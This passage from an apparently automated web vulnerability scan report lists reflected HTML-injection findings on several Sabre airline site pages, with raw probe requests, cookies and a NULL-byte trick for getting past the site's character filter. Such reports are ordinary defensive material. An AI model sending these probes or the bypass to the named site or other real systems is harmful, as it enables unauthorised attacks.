GET /home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1"> ...[SNIP]...
3.27. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/error
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b96d0<a>59e01a505f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b96d0<a>59e01a505f3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/error?%00b96d0<a>59e01a505f3=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend/error/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>59e01a505f3=1">error?%00b96d0<a>59e01a505f3=1</a> ...[SNIP]...
3.28. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/error
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073d52"><a>132b3839ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73d52"><a>132b3839ba7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/error?%0073d52"><a>132b3839ba7=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend/error/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/error?%0073d52"><a>132b3839ba7=1"> ...[SNIP]...
3.29. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/error/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a1fc9<a>54ce38393eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1fc9<a>54ce38393eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/error/?%00a1fc9<a>54ce38393eb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>54ce38393eb=1">?%00a1fc9<a>54ce38393eb=1</a> ...[SNIP]...
3.30. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/error/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007d0b4"><a>0bfb3bd1f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0b4"><a>0bfb3bd1f3c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1"> ...[SNIP]...
3.31. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/past_editions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %003813b<a>beec50d4773 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3813b<a>beec50d4773 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/past_editions?%003813b<a>beec50d4773=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>beec50d4773=1">past editions?%003813b<a>beec50d4773=1</a> ...[SNIP]...
3.32. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/past_editions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bfa83"><a>c79bbe5d840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa83"><a>c79bbe5d840 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1"> ...[SNIP]...
3.33. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/past_editions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b1d68<a>0439c7c0b28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d68<a>0439c7c0b28 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/past_editions/?%00b1d68<a>0439c7c0b28=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>0439c7c0b28=1">?%00b1d68<a>0439c7c0b28=1</a> ...[SNIP]...
3.34. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/past_editions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f440"><a>15f7641391c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f440"><a>15f7641391c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/past_editions/?%005f440"><a>15f7641391c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/past_editions/?%005f440"><a>15f7641391c=1"> ...[SNIP]...
3.35. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/subscribe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00bb836<a>0b6cf4318e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb836<a>0b6cf4318e4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/subscribe?%00bb836<a>0b6cf4318e4=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>0b6cf4318e4=1">subscribe?%00bb836<a>0b6cf4318e4=1</a> ...[SNIP]...
3.36. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/subscribe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091ac9"><a>933075383e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ac9"><a>933075383e5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/subscribe?%0091ac9"><a>933075383e5=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/subscribe?%0091ac9"><a>933075383e5=1"> ...[SNIP]...
3.37. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/subscribe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00e964d<a>cff7214ce32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e964d<a>cff7214ce32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/subscribe/?%00e964d<a>cff7214ce32=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>cff7214ce32=1">?%00e964d<a>cff7214ce32=1</a> ...[SNIP]...
3.38. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/subscribe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd50a"><a>ad2e0e8eeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd50a"><a>ad2e0e8eeb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
